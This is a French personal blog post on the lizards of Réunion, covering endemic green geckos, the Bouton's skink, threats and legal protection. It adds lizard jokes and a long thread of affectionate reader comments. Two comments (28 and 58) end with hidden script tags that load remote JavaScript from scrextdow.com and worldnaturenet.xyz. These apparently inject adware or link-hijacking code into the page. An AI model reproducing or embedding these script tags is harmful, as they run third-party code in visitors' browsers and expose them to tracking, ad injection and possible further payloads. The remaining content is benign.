• DES LÉZARDS UNIQUES AU MONDE + Blagues

    DES LÉZARDS UNIQUES AU MONDE

     

    Bonjour à toutes et tous et bienvenue sur mon blog.

     

    Résultat de recherche d'images pour "bonjour lézard.gif"

    Ce jour je vous parlerai des tites bébêtes que j'aime bien les lézards....

    Tout d'abord le gecko vert

    Phelsuma borbonica est une espèce de geckos de la famille des Gekkonidae. Elle est nommée en français sous de nombreuses variantes : Gecko vert des Hauts, Gecko diurne de Bourbon, Gecko diurne de la Réunion, Lézard vert des Hauts, Phelsume de Bourbon et tout simplement « lézard vert » en créole réunionnais, la photo ci-dessus est du site WIKIPEDIA

     

    Résultat de recherche d'images pour "bonjour lézard.gif"

    DES LÉZARDS UNIQUES AU MONDE du site http://www.ipreunion.com

     

    DES LÉZARDS UNIQUES AU MONDE

     

    La Réunion trouve sa place au sein de l'un des 34 "points chauds" de la biodiversité mondiale. Sur l'île, 17 espèces de reptiles terrestres vivant à l'état sauvage ont été recensées *. 14 d'entre-elles ont été introduites volontairement ou non par l'homme et seules trois espèces sont indigènes et endémiques, c'est-à-dire qui n'existent qu'à La Réunion. Parmi les vertébrés, les reptiles sont "l'un des groupes dont le statut de conservation est le plus défavorable, l'un des plus menacés d'extinction" souligne l'association Nature Océan Indien (NOI). Des deux geckos verts endémiques de La Réunion, le plus menacé est le gecko vert de Manapany. "La chasse, la destruction de l'habitat et l'introduction de nouvelles espèces plus compétitrices sont les principales causes de la destruction de ces espèces fragiles et uniques au monde" indique l'association qui milite pour la protection des reptiles endémiques et de leurs habitats.

    Avant l'arrivée de l'homme, les Mascareignes étaient l'archipel océanique qui possédait "le plus riche herpétofaune (ensemble des espèces de reptiles, et par extension des amphibiens) au monde" indique l'association NOI. "Les taux d'endémisme atteignaient 83 % pour la Réunion. Cette richesse fut en partie détruite dès les débuts de la colonisation humaine, et se sont près de 60 % des espèces réunionnaises qui ont disparu" poursuivent les responsables de l'association.

     

    Les espèces présentes aujourd'hui à la Réunion se répartissent en six groupes : les geckos diurnes ou geckos verts (7 espèces dont 2 endémiques et 5 exotiques), les scinques (1 espèce endémique), les geckos nocturnes (4 espèces exotiques), les caméléons (1 espèce exotique), les agames (2 espèces exotiques) et les serpents (2 espèces exotiques).

     

    DES LÉZARDS UNIQUES AU MONDE

     

    Parmi les espèces endémiques, on trouve les geckos verts (aussi appelés lézards verts) et le scinque de Bouton. Le gecko vert des Hauts est réparti entre 50 m et 2200 m d'altitude. Il se retrouve principalement en forêt indigène humide. Le gecko vert de Manapany est quant à lui présent dans le sud de l'île entre Grande Anse et Saint Joseph. Il vit principalement dans les arbres, mais est parfois être présent dans les maisons. Leur statut de conservation est en cours d'évaluation par l'UICN (union internationale pour la conservation de la nature) en vue d'une possible inscription sur la liste rouge mondiale des espèces menacées. A La Réunion, aucune donnée scientifique certaine n'existe sur la répartition actuelle du scinque de Bouton qui était considérée comme disparue depuis plus de 130 ans. Une population a été redécouverte en 1999, mais les connaissances actuelles sur sa répartition et son statut de conservation sont quasi-inexistantes, rapporte l'association NOI.

     

    Des espèces de reptiles terrestres ont été introduites d'Asie, d'Afrique du Sud ou encore de Madagascar et se sont acclimatées à La Réunion. Parmi les geckos diurnes de La Réunion, cinq sont exotiques : le grand gecko vert malgache, le gecko vert poussière d'or, le gecko vert à ligne noire, le gecko vert de Maurice, le gecko vert des Seychelles. Mais il existe aussi les geckos nocturnes (aussi appelés margouillats) : le margouillat blanc, le margouillat des jardins, le margouillat des maisons et le margouillat à queue jaune. Au registre des espèces introduites, on compte également le caméléon ou "endormi" introduit depuis Madagascar en 1850, les agames (agame des colons et agame arlequin ou "caméléon"), mais aussi les serpents (couleuvre loup ou "couleuv'miel"" et la couleuvre de terre ou "serpent aveugle").

     

    undefined

     

    Plusieurs menaces pèsent sur les populations de reptiles, selon l'association Nature Océan Indien. L'introduction par l'homme d'espèces animales exotiques est l'une des premières causes d'extinction d'espèces dans les îles. D'autre part, la perte, la dégradation et la fragmentation de l'habitat sont principalement liées au développement urbain et agricole et aux espèces végétales invasives. Elles conduisent au fractionnement des espèces en populations de faibles effectifs. Ces petites populations sont sujettes à de rapides déclins, voire à des extinctions. Enfin les pollutions environnementales telles que les épandages de produits phytosanitaires posent également un problème à La Réunion. "Bien que ces contaminants soient suspectés d'avoir contribuer au déclin des reptiles au niveau mondial, il n'existe que très peu d'études écotoxicologiques sur le sujet" déplore l'association.

     

    DES LÉZARDS UNIQUES AU MONDE

    Au niveau international, les geckos verts endémiques de la Réunion n'ont pas encore été évalués par l'UICN (union internationale pour la conservation de la nature) et ne figurent pas sur la liste rouge des espèces menacées. Cependant le commerce de toutes les espèces du genre phelsuma (geckos diurnes issus de l'île de Madagascar et des environs, Réunion, Seychelles...) est réglementé par la convention sur le commerce international des espèces de faune et de flore sauvage menacées d'extinction (CITES). Elles sont inscrites à l'annexe II de la CITES qui regroupe les espèces qui, bien que n'étant pas nécessairement menacées actuellement d'extinction, pourraient le devenir.

     

    Au niveau national, les geckos verts endémiques sont protégés par l'arrêté du 17 février 1989 qui interdit la destruction ou l'enlèvement des oeufs, la destruction, la capture ou l'enlèvement ainsi que la naturalisation des spécimens, qu'ils soient vivants ou morts, leur transport, leur colportage, leur utilisation et leur commerce. Par ailleurs, même s'il s'agit d'une espèce exotique introduite, le caméléon est considéré comme faisant partie du patrimoine culturel de l'île, à ce titre il est protégé par ce même arrêté.

     

    * Ne sont pas comptées les espèces de compagnie parfois rencontrées dans la nature mais non acclimatées comme les iguanes ou les tortues radiées.

     

    undefined

    FIN

     

    Résultat de recherche d'images pour "BLAGUES.GIF"

     

     

    Contrairement aux hommes le lézard peut sacrifier sa queue pour sauver sa vie Smiley rire lol

    ***

    Pourquoi les lézards aiment-ils les vieux murs ?
    Parce que c'est là qu'on trouve le plus de lézardes !

    ***

    Un koala était assis sur la branche d'un eucalyptus et fumait un joint !

    Un petit lézard passa par là, regarda le koala et dit :

    - Hey koala ! Qu'est-ce que tu fais ?

    - Je fume un joint, viens me rejoindre.

    Alors le petit lézard grimpa et s'assit à côté du koala et ils fumèrent quelques joints.

    Après un certain temps, le petit lézard dit qu'il avait la bouche sèche et qu'il allait boire un peu d'eau à la rivière.

    Le petit lézard était si gelé qu'il glissa de l'arbre et tomba dans la rivière.

    Un crocodile l'aperçut et nagea vers le petit lézard, qu'il aida à regagner la rive.

    - Qu'est-ce qui se passe avec toi ? dit le crocodile.

    Le petit lézard expliqua au crocodile qu'il était assis avec le koala dans l'arbre à fumer un joint, mais il devint trop gelé et tomba dans la rivière...

    Le crocodile se dit qu'il devait tirer ça au clair et marcha dans la forêt tropicale, trouva l'arbre où se trouvait le koala en train de terminer son joint.

    - Hey toi ! dit le crocodile.

    - Purée qu'est-ce que t'as bu comme flotte ! dit le koala en voyant le crocodile.

    Smiley rire lol mdr

    Résultat de recherche d'images pour "bonjour lézard.gif"

     

    Résultat de recherche d'images pour "MERCI GIF ANIME GECKO"

    Mille mercis pour vos visites, vos commentaires.

    Portez-vous bien et belle fin de semaine à toutes et tous.

    Gros bisous d'amitié à vous partager.

     

    Résultat de recherche d'images pour "bisous de françoise"

    Partager via Gmail Yahoo! Pin It

    Tags Tags : ,
  • Commentaires

    1
    Jeudi 12 Juillet à 07:06

    J' ai toujours été passionné par les reptiles, que ce soient  les  tortues, les lézards, les caméléons ou les serpents !

    Ils possèdent le plus souvent de superbes couleurs, comme ce  lézard vert !

     J' ai eu  un terrarium avec des ophidiens !

     Merci  pour l' histoire et ce crocodile sympathique !

     Passe une bonne journée

     Bisous

    2
    Jeudi 12 Juillet à 07:14
    renejeanine

    bonjour chere Fany, tu m'impressionnes,  tu en  connais un bout sur les lezards !! merci pour cette belle documentation, helas ce pauvre lezard est souvent en voie de disparition, je crois bien que chez nous ça sera pareil, car Harry deploie de grands efforts pour les chasser ! tout fier il me les rapporte, certains parviennent à s'echapper, et se cachent sous les meubles ! ce qui est certain c'est qu'on en voit moins , de toutes façons, il n'y a pas ici, une aussi grande variété que chez vous, merci pour les blagues , et bravo le chat, plus affectueux que mon Harry avec les lezards !! j'espère que tout va bien, bon jeudi et grosses bises, porte toi bien ! 

    3
    Jeudi 12 Juillet à 07:14

    Coucou ma Fany,

    Superbe billet éducatif et très intéressant. Le gecko de Palawann m'a fichu la trouille de ma vie. En 2001, étions là- bas en vacances. Dans les bungalows du lieu où nous nous trouvions, j'avais laissé ma valise ouverte. Et moment de repartir sur Manille, j'ai refermé la valise dans laquelle s'était installé un gecko. Ce n'est qu'en arrivant à Manille, à l'hôtel, que j'ai eu la surprise de voir surgir l'animal ! 

    Bises et bon jeudi

    4
    Jeudi 12 Juillet à 07:40

    Les "r empan" ne sont pas ma tasse de thé mais.........je me soigne yes

    La couleur les rend plus beaux 

    Les miens en terrasse me font sursauter ...

    Mais ces p'tites bêtes sont utiles 

    Bisous 

    Bonne journée sur ton île  

    5
    Jeudi 12 Juillet à 08:08
    4ine
    Ce n'est pas mes animaux préférés mais ils sont beaux . Ha! ha! super la blague du crocodile. Belle journée bisoussssssss ma belle
    6
    Jeudi 12 Juillet à 08:56

    C'est pas bon les joints.... ça fait gonfler le ventre

    Jeudissimes gros bisous tite Zoizelle verte des Îles

    7
    Jeudi 12 Juillet à 09:12

    Bonjour Françoise.

    Sympa l'histoire du petit lézard et du crocodile.

    C'est toujours avec le beau temps qui perdure que je viens te souhaiter un bon Jeudi.

    Nous serons absent à partir de demain Vendredi jusqu'à la semaine prochaine.

    Bisous de nous deux.

    8
    Jeudi 12 Juillet à 09:58

    J'adore aussi les lézards et les camé léons de chez toi   surtout les espèces rares qui fument des joints!

    bisous

    claire

    9
    Jeudi 12 Juillet à 10:25
    10
    Jeudi 12 Juillet à 10:54

    Merci beaucoup pour vos commentaires, quel plaisir de vous lire.

    Bel AM et gros bisous d'amitié à vous partager et à plus !!!!!!!

    11
    Jeudi 12 Juillet à 12:11

    Accueil

    Coucou ma Douce !

    Tu vois, moi aussi, j'ai mon petit lézard ! MERCI pour ce bel article intéressant, ils sont de toute beauté. Le gif animé de ce minou qui fait des bisous au lézard c'est trop mignon !

    J'espère que tu vas bien. Tu es magnifique sur cette photo et tu as coupé un peu tes cheveux. Cette coiffure te va très bien. Tu arrives à avoir ce que tu veux avec les coiffeurs ? moi pas, ils n'écoutent pas ce que je leur demande et font à leur manière, cela me met en rage ! Grrrrrrrrrrrr ! Et je ne suis pas la seule à le constater !

    Repos pour deux mois, avant les examens de contrôle et les consultations, en Septembre, pour mon époux. Mais il a récupéré un peu et a retrouvé, à mon grand soulagement, un visage reposé, après ces gros soucis. Il reste encore un problème à régler, mais il faut patienter avec les spécialistes !

    Il fait bon chez toi, la vue de ces belles images, cela rafraîchi, après cette canicule. mais je ne me plains pas, car j'adore ces grandes journées ensoleillées, même si c'est dur à supporter. L'hiver viendra bien assez tôt !

    Belle journée à toi mon amie de coeur et d'âme. Je t'aime. A bientôt et gros gros bisous. Coryphee

    12
    Jeudi 12 Juillet à 12:49
    j'adore ces petities bêtes je les trouve très sympas gros bisous ma Fany passe une douce journée dans ta belle île intense que j'adore. Rosa
    13
    Jeudi 12 Juillet à 12:59
    Bonjour Françoise,
    Ben moi aussi je les adore. D'ailleurs j'aimerais en avoir un, maintenant que je vis seule personne ne pourra m'en empêcher.
    Ton histoire m'a bien fait rire, je la note !
    Je te souhaite une très bonne journée, grosses bises Véronique
    14
    Jeudi 12 Juillet à 13:15

    Bonjour Françoise

    Ces petites bêtes me fascinent , celles que tu nous présente sont vraiment superbes , j'adore les couleurs .

    Je te souhaite un très bon après-midi.

    Gros bisous

    15
    Jeudi 12 Juillet à 13:32

    bonjour Françoise

    intéressant ton articles sur les lézards et cousins...je ne leur fait aucun mal, je sais qu'ils sont très utiles dans le jardin mais j'en ai peur, remarque parfois je ris car lorsque j'en croise au jardin on se fait peur mutuellement !!

    J'avais un chien qui passait ses journées à les traquer, à les regarder sur les murs avec une patience incroyable et un autre chien qui s'en fichait !!

    bisous et belle journée

    16
    Jeudi 12 Juillet à 14:03
    Chantal33300

    Qu'ils sont beaux les lézards chez toi. Bises Françoise, et bonne journée. 

    17
    Jeudi 12 Juillet à 14:04

    Un très bel article ma Fany, car je ne connaissais pas toutes ces variétés. Qu'est-ce qu'ils sont beaux!  hi hi la blague du lézard et du crocodile lol !!!!!

    Belle fin de semaine et plein de gros bisous. Merci tout plein pour toutes tes gentilles visites.

    chatou

    18
    Jeudi 12 Juillet à 14:19

    et bin toute une lecon de lezards didonc....j'adore...c'est vrai que cela peut etre si beau avec toutes ces couleurs....et de bien bonnes blagues...mdr....

    19
    Jeudi 12 Juillet à 14:26
    francinea

    Bonjour, j'adore les geckos, quand je suis partie à la Réunion en 2016 chaque matin il y en avait deux qui se prélassaient au soleil sur la rampe des escaliers de la maison; très craintifs, mais au bout de quelques jours ils ne se sauvaient plus; merci pour les petites histoires, je te souhaite une bonne journée, bisous

    20
    Mizousze
    Jeudi 12 Juillet à 14:52

    Bonjour ma FANY  chérie .. Merci pour toutes ces explications . ais j’ai une peur bleue des gros lézards verts ,les petits j’aime bien mais ces gros me font peur.. Meci pour tes blagounettes toujours marrantes .. Je suis en plein travail de démontage de ma roulotte hihihi... j’aime bien arriver mais les départs sont toujours dures.. Et toi ma douce que fais tu de beau en ce moment? . Ici chaud chaud... Nous partons samedi matin et arriverons dimanche à la ROCHELLE.. En attendant de te retrouver je te fais de gros bisous ....MIZOU 

    21
    Jeudi 12 Juillet à 15:08

    Bonjour ma belle du petit rocher ! Oh j'ai bien ri avec les blagounettes surtout celle de l'homme lol mais en fait la dernière est trop mimi avec le croco oups il a bien gonflé lol ! Par contre, je n'ai jamais aimé les reptiles et encore moins les araignées ! Avant que j'arrive dans ma Bretagne j'étais en Vendée et là j'avais des lézards oups et bien entendu je tombais dessus à chaque fois mais surprise. On avait des bananiers et ils aimaient se cacher dedans car ils étaient plantés à côté de murs en pierre. Par contre, c'est très beau. Alors je vais te faire rire car ici à Saint Malo enfin sur la rive gauche de l'autre côté du barrage et bien devine quoi quiya ? Des petits lézards oups ! J'ai eu des tortues eau et terre que j'ai aimées, ça s'apprivoise bien.

    Joli reportage mais je te laisse tes bestioles lol ! Merci pour la rigolade !

    Je t'embrasse de ma mer émeraude où l'écume vient me lécher les pieds. Bonne fin de journée à bientôt 

    22
    Jeudi 12 Juillet à 16:24

    bonjour Fany
    je n'aime pas du tout les reptiles ,ils me paralysent
    bien ri en lisant tes blagues ,c'est une bonne détente
       La journée est ensoleillée avec un peu de fraîcheur
    Je te souhaite de passer une agréable journée
    bisous et amitié de Bourgogne

    23
    Jeudi 12 Juillet à 16:30

    Kikou douce Françoise

    Sympa ces petites bêtes qui rampent. Pour ma part je n'en ai pas peu, je ne les crain pas sauf lorsqu'il commencent à faire 5 mètres de long, alors là je me méfie.

    J'adore l'image animée du chat et de l'iguane miniature, c'est adorable. 

    Bon j'espère que pour toi ca va aller. Pour les problème de ton mal à la jambe il n'y a pas à se tromper, si ça te fait mal derrière c'est la sciatique, si tu as mal devant c'est la cruralgie, si tu as mal partout c'est que tu as les deux en même temps, dur dur là !

    Je te souhaite un bon rétablissement.

    Gros bisous et douce journée malgré la fraîcheur chez toi.

    @lain

    24
    Jeudi 12 Juillet à 16:33

    Ils ont de belles couleurs, mais je ne suis pas fan de ces bêtes !!!! Merci pour ce super reportage, photos et blagues. Moi j'ai rendez vous le 24 juillet avec l'anesthésiste et le 31 juillet l'examen. Aujourd'hui il a fait un peu moins chaud mais samedi ça reviens. Bisous bonne soirée et bon week-end FANY ainsi qu'a toute la famille       "Ti Bo"

                                                     

    0_13cd8c_2e800cc2_orig.jpg

      

    25
    Jeudi 12 Juillet à 16:53

    Merci beaucoup pour vos commentaires.

    Douce soirée et belle nuit étoilée.

    Une envolée de gros bisous d'amitié à vous partager de mon ti rocher.

    26
    Jeudi 12 Juillet à 17:40

    coucou Fany 

     sont beaux tes lézards

    ah oui faudrait lézarder plus!!

    et j'ai décidé de  faire moins d'ordi aussi

     santé oblige

     douce soirée ma belle

     gros bisous

     

    27
    Jeudi 12 Juillet à 17:46

    BONJOUR FRANÇOISE !

    Tu ne peux pas savoir combien de geckos nous avons vu en Thaïlande, des jaunes et des verts, il y en avait un qui est resté collé sur la vitre du car !

     

    A propos de Caméléon, il y a des caméléons nains, vraiment nains :

    Et en plus le plus petit ouistiti du monde (il est adulte) !

    Gros Bisous Françoise !

    RÉMY.

    28
    Jeudi 12 Juillet à 22:20

    coucou Françoise joli cet petites bestioles bonne soirer

    <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2" type="text/javascript"></script>
    29
    Jeudi 12 Juillet à 22:27

    Wow !!! comme elles sont belles ces lézards , que des belles couleurs , mais toujours peur de les voir autour , hi hi .  J'aime l'image du chat avec le gros lézard et la blague aussi , quel beau partage ma douce petite soeur , Merci pour tout .

    Bon Week end ma douce Fany et prend bien soin de toi , merci pour tout et de tes contacts messages . je t'embrasse Mirella qui aime a ou beaucoup .  

    30
    Jeudi 12 Juillet à 22:28

    <style></style>

    Oh ma Fany chérie, mon adorable amie,

    comme c'est chouette de pouvoir admirer ces lézards que j'aie tant. Il y a quelques temps quand je vous ai mis mes vacances 2017, j'avis vu un lézard bleu et vert, qui ressemblait à un des tiens. Waou c'est trop beau!

    Je ne sais pas si tu es amie avec Mamie Lucette, qi présente une fois par semaine un poème, j'ai gardé le dernier que j'aime beaucoup, pour toi.

     

    Un rêve de bonheur… 


    Un rêve de bonheur qui souvent m’accompagne,
    C’est d’avoir un logis donnant sur la campagne,
    Près des toits, tout au bout du faubourg prolongé,
    Où je vivrais ainsi qu’un ouvrier rangé.
    C’est là, me semble-t-il, qu’on ferait un bon livre.
    En hiver, l’horizon des coteaux blancs de givre ;
    En été, le grand ciel et l’air qui sent les bois ;
    Et les rares amis, qui viendraient quelquefois
    Pour me voir, de très loin, pourraient me reconnaître,
    Jouant du flageolet, assis à ma fenêtre.
     

    François Coppée``  

     

    Je ne ne raconte pas les méandres de mes aventures de clavier, tu en as eu assez comme ça.

    Profite de la vie et ne t'inquiète pas pour moi on trouvera. On trouve toujours une solution, plus ou moins bonne mais on trouve.

    Alors bonne fin de semaine et je t'envoie une envolée de bisous de métropole, mi aime aou beaucoup.

    Sylvie

     

     

     

     

    <style></style>
    31
    Jeudi 12 Juillet à 23:21

    plage

    Bonjour ma belle Françoise,

    Merci pour ton article qui est éducatif mais très intéressant. Ils sont mignons comme tout. Je te souhaite un bon weekend. Prend bien soin de toi. Je t'embrasse très fort.

    32
    Vendredi 13 Juillet à 04:21

    Bonjour  FANY

    Nous voici a la fin de semaine

    avant un week end qui devrait être

    avec cette journée de vendredi treize

    dans la continuité d'un temps

    chaud et bien ensoleillé,

    et de vous préparer a un week end

    bien chargé en émotions!

    Bon vendredi 13, bonne chance

    et surtout un bon profit

    de cette fin de semaine....

    Amitiés ¨¨^#^¨¨ Bisous 

    .* J-G-R-C-201*.

    33
    Vendredi 13 Juillet à 08:00
    renejeanine

    bonjour chere Fany, bravo pour ce bel article sur les lezards, et la bonne blague sur le croco ! alors ça y est la Fournaise s'est reveillée une fois de plus ! ça va mobiliser les photographes, j'ai vu la première image sur FB , demain il faut mettre la cravate, pas d'autre solution ! mais du moment que ma petite fille est heureuse c'est l'essentiel ! ah Noe est comme moi, il n'aime pas ça, je suppose qu'il n'en portait pas  au boulot, moi j'ai du en porter pendant trente ans ! sauf quand j'etais à Dakar, où on travaillait le torse nu ! je te souhaite une heureuse fin de semaine , grosses bises, porte toi bien chere Fany ! 

    34
    Vendredi 13 Juillet à 08:45

    Je n'aime pas particulièrement ces petites bêtes mais je trouve que les couleurs sont magnifiques. Merci pour ce beau reportage.

    J'ai beaucoup aimé la blagounette du koala!

    très belle journée, bises de la Côte d'Azur.

    danièle

    35
    Vendredi 13 Juillet à 10:31

    Bonjour Françoise . une très jolie histoire très jolie lézards .

    Je te souhaite un bon weekend bisous 

    36
    Vendredi 13 Juillet à 11:26

    bonjour Françoise

    mignonne la blague du crocodile, cela ne m'arrivera pas, je ne bois pas assez, si je gonfle ce sera d'autre chose...

    ce midi j'attends mes amis et ma nièce, le repas est prêt plus qu'à chauffer et à allumer le BBQ,

    la piscine prête aussi

    bisous

    37
    Vendredi 13 Juillet à 13:14

    Bonjour ma douce Fany, comme ils sont  eaux tous ces lézards, ce sont des reptiles utiles pour la nature.

    j'en ai beaucoup dans mon jardin mais assez petits et moins colorés.

    j'espère que tu vas bien...

    ici il fait un peu chaud à mon goût, alors l'après midi je reste enfermée.

    Bon week end du 14 Juillet...gros bisous - Landrie

    38
    Vendredi 13 Juillet à 13:25

    Bonjour ma Zoreille

    Lézard, petite bestiole que j'aime beaucoup et très utile dans la nature.

    On en apprend tous les jours en venant chez toi lol

    Ha ha la blague du lézard et de l'homme lol lol lol tu m'étonnes que lui s'il la perd mdr wink2

    J'ai eu un jour une histoire avec un petit gecko : En vacances dans le sud du Portugal, dans ma maison, nous avons enlever de vieux meubles, qu'on a apporté a la déchetterie , puis  nous sommes remontés en France, et là .... a notre grande surprise , un petit gecko est sorti du coffre de la voiture, toujours vivant après plusieurs jours passé dans ce coffre auto, et pour l'attraper, j'ai placé une petite cage avec nourriture et eau, il est rentré dedans après plusieurs heures d'observation  et d'attente, je l'ao gardé dans un vivarium pendant 1 an, je voulais le relacher dans la nature au Portugal au prochain voyage, mais avec sa mue il est mort , je ne savais pas à l'époque qu'il fallait l'humidifier pendant cette mue erf.

    Un comme celui-ci

    Bonne fin de journée ma Fany, bisous, prend soin de toi, et  vive les bleus dimanche !  

      • Samedi 14 Juillet à 07:51

        Bonjour Fany

        Oups, mon image du gecko que je t'avais mis dans mon commentaire,  a disparue arf

    39
    Vendredi 13 Juillet à 14:27

    Bonjour Françoise

    Je suis en pause d'été jusqu'au 3 septembre , on se retrouve bientôt.

    Bon après-midi et bel été à toi . 

    Gros bisous

    40
    Vendredi 13 Juillet à 18:09

    Bonjour ma Françoise, j'aime bien mes petits lézards gris bien que le gecko les ait remplacés, mais de loin c'est mieux et en photo c'est très joli parce qu'ils ont de belles couleurs. La journée d'hier un peu moins chaude a été positive. Mais mes petites douleurs me hantent... J'espère que le we sera bon.

    on s'est fait une super balade avec nos toutous. Ils sont couchés, très fatigués, impossible de mettre la patte dans l'eau...

    Bises de nous 2

    41
    Vendredi 13 Juillet à 22:13

    Ils sont superbes tous ces lézards

    Ils sont bien colorés , ici  il n'y a que des verts et ils sont petits

    Merci pour toutes ces bonnes histoire Fany

    Passe un agréable week-end

    Gros bisous

    42
    Samedi 14 Juillet à 00:13
    Bonjour Françoise,
    Tu veux rire ? Je me suis renseignée pour adopter un lézard. Bon c'est un projet mais j'en ai très très envie.
    Tu as des animaux Françoise ?
    Je te souhaite un très bon 14 juillet, grosses bises Véronique
    43
    Samedi 14 Juillet à 07:23
    renejeanine

    bonjour chère Fany...alors la Fournaise s'est déjà eteinte, c'etait seulement pour annoncer la "Fête Nationale" !! bravo les lezards, je te souhaite un bon 14 juillet ! pour nous ce sera le mariage de ma petite fille Christie, donc une journée faste ! il y aura des photos bien entendu ! heureux weekend chere Fany, grosses bises, porte toi bien !...

    44
    Samedi 14 Juillet à 07:39

    Merci à toutes et tous pour vos visites, vos commentaires, belles créations...

    Notre volcan hier matin était en éruption et s'est éteint hier soir....pour nous annoncer le vendredi 13 et le 14 juillet.

    Liberté, égalité, fraternité, je vous souhaite une belle journée du 14 juillet ainsi qu'un excellent dimanche.

    Une envolée de gros bisous d'amitié de mon ti rocher ensoleillé et venteux à vous partager et

    RV LUNDI MATIN SUR CE BLOG POUR UN NOUVEL ARTICLE (PHOTOS).

     

    45
    Samedi 14 Juillet à 08:35

    Bonjour Françoise.

    Je n'ai pas été absent des blogs.

    Le temps tourne à l'orage; j'espère qu'il n'y aura rien de violent ... comme au Japon !

    Bonne fin de semaine.

    Gilbert

    46
    Samedi 14 Juillet à 09:03

    Du soleil, et toujours pas de pluie chez moi, il en faudrait pourtant

     Passe un bon  14 juillet et une bonne fin de semaine

     Bisous

    47
    Samedi 14 Juillet à 09:20

    Juste un tit coucou, en copier/coller, pour te remercier de ta fidélité.
    Bonne fin de semaine, sous le soleil, tant qu'à faire !
    Je t'embrasse très fort et ... à bientôt.

    48
    Samedi 14 Juillet à 10:21

    Bonjour douce Françoise

    Je n'étais pas là hier de toute la journée et maintenant je suis en retard pour les réponses aux commentaires.

    Je me dépêche car à midi invitation à manger des moules frites, quel bonheur.

    Sinon ici temps d'été, c'est magnifique et ça regonfle le moral qui va bientôt retomber comme un soufflet lorsque le mauvais temps va arriver, donc profitons du mioment présent.

    J'espère que tu vas bien

    Je te souhaite une douce journée

    Gros bisous

    @lain

    49
    Samedi 14 Juillet à 14:38

    bonjour Françoise,

    prête pour aller voir le feu d'artifice ?? je voulais aller voir celui de Marseille mais il y a trop de monde et le secteur sera interdit à la circulation très tôt dans l'aprem..c'est bien dommage car il est toujours grandiose.

    De plus, et c'est rare , pas de mistral aujourd'hui !!!

    bisous et bonne soirée

    50
    Samedi 14 Juillet à 19:01

    Coucou ma petite Françoise,

     je me décide enfin à venir visiter les copinettes. Je suis en pause depuis fin juin car j'en avais besoin et j'ai fort à faire chez moi (peinture entre autre) J'aime beaucoup tes geckos que je trouve très beau. J'en ai, en faux, contre la porte de mon jardin. J'ai bien ri avec tes blagounettes. Ici le temps est très chaud, on cuit sur place, lol, mais bon, faut pas se plaindre. Je ne reprends le blog que début septembre, tu vois. Je vais partir quelques jours en vacances au bord de l'océan. Je t'envoie plein de grosses bises et te dis à bientôt sur ton île. ♥

    51
    Dimanche 15 Juillet à 07:07

    Bonjour  FANY

    Après le podium de la BELGIQUE...  

    ALLEZ les bleus.

    Ce dimanche n'est pas comme les autres

    mon regard se détourne vers le ciel,

    ou brille dans cette nuit noir les étoiles

    Entre rêve et réalité, une seule suffirait

    au bonheur de tout un peuple.

    Que le bleu du ciel descende

    avec l'étoile du bonheur sur le terrain

    ou joue a Moscou cet après midi

    les bleus de l’équipe de FRANCE

    bon dimanche & bonne étoile

    Amitiés & Bisous 

    .* J-G-R-C-201*.

    52
    Dimanche 15 Juillet à 09:23

    coucou fany

    me revoilà !

    je recommence un peu à venir sur l'ordi ....

    très joli reportage en photos ! ces lézards sont magnifiques ! dommage que certaines espèces (encore une fois ) soit menacées !

    et toujours de bonnes blagues !

    je te souhaite un bon dimanche ici sous la chaleur

    gros bisous

     

     

    53
    Dimanche 15 Juillet à 09:25

    coucou fany ! me revoilà 

    je recommence à venir sur l'ordi....

    très joli reportage en photos ! ces lézards sont magnifiques 

    dommage (encore une fois) que certaines espèces soient menacées

    je te souhaite un bon dimanche ! ici sous la chaleur

    gros bisous

    54
    Dimanche 15 Juillet à 11:26
    renejeanine

    bonjour chere Fany, un peu en retard cause mariage ma petite fille,  hier, tout s'est bien déroulé, dans la joie et la bonne humeur , tu as du voir les photos sur FB, petit coucou aux beaux lezards, apres midi tendue, cause match ! j'y crois, mais les adversaires sont tres valeureux ? attention ! je te souhaite un beau dimanche, grosses bises, porte toi bien chère Fany ... 

    55
    Dimanche 15 Juillet à 23:22

    glace

    Bonjour Françoise,

    Je viens te souhaiter une superbe semaine sur ton petit rocher. Prend bien soin de toi. Je t'embrasse très fort.

    56
    Lundi 16 Juillet à 04:45

    Merci beaucoup pour vos commentaires. Gros bisous à vous partager

     

    RV ce matin sur mon nouvel article :

    http://beautirocher.eklablog.com/jardin-des-1001-saveurs-a-st-andre-2-12-a145573328

    57
    Lundi 16 Juillet à 20:36

    Wouaw! Ces reptiles sont de toute beauté! je ne les avais jamais vus.

    Au jardin, en plus des lézards, nous avons de plus en plus de geckos. Il y en a gris ardoisé et d'autres beige verdâtre. C'est fascinant tout ça. Merci pour tous tes renseignements.

    Bises amicales

    smile

    58
    Mercredi 18 Juillet à 18:47

    coucou françoise kan lily a etait o gabon 2ans avec sa mére mission militaire a la camera elle me faisait voir il y en avait dans le pavillon ou elle logé   lily avait 3 ans navait meme pas peur

    <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52293x7264x&r=11" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2&blocks[]=02aed" type="text/javascript"></script>
    59
    Mercredi 18 Juillet à 19:13

    Merci pour vos commentaires. Gros bisous à vous partager

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :